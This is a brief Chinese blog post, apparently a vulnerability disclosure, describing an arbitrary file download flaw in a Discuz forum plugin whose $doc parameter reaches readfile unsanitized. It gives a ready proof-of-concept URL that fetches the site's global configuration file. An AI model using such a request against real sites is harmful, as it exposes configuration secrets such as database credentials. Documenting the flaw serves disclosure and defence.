Discuz某插件任意本地下载漏洞

Author:y0umer
插件的下载地址:
http://www.discuz.net/forum.php?mod=viewthread&tid=3169556
然后看代码:

$doc居然没经过任何处理就readfile了。。。

http://0day5.com/source/plugin/doconline/doconline.php?doc=/config/config_global_default.php

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录